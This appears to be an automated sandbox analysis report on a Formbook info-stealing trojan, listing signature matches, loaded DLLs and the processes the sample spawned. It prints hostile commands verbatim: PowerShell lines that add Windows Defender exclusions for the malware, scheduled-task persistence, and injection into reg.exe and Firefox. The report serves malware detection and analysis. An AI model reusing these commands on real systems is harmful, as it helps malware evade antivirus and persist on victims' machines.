            Source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: AZJifQrhDpEQCA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ekiVxK6VuR4OQnevN0.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ekiVxK6VuR4OQnevN0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ekiVxK6VuR4OQnevN0.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, webBCGxs4cEidVqfoA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ekiVxK6VuR4OQnevN0.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ekiVxK6VuR4OQnevN0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ekiVxK6VuR4OQnevN0.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, webBCGxs4cEidVqfoA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ekiVxK6VuR4OQnevN0.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ekiVxK6VuR4OQnevN0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ekiVxK6VuR4OQnevN0.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, webBCGxs4cEidVqfoA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 9.2.AZJifQrhDpEQCA.exe.285ef1c.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.jlsvOH1c8bSRKqM.exe.5150000.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 9.2.AZJifQrhDpEQCA.exe.2866f34.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/16@15/8
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeFile created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB59F.tmpJump to behavior
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: jlsvOH1c8bSRKqM.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: reg.exe, 00000011.00000003.2044962456.0000000003106000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4128479477.0000000003106000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: jlsvOH1c8bSRKqM.exeReversingLabs: Detection: 34%
            Source: jlsvOH1c8bSRKqM.exeVirustotal: Detection: 31%
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeFile read: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"Jump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"Jump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"Jump to behavior
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: windows.storage.dllJump to behavior
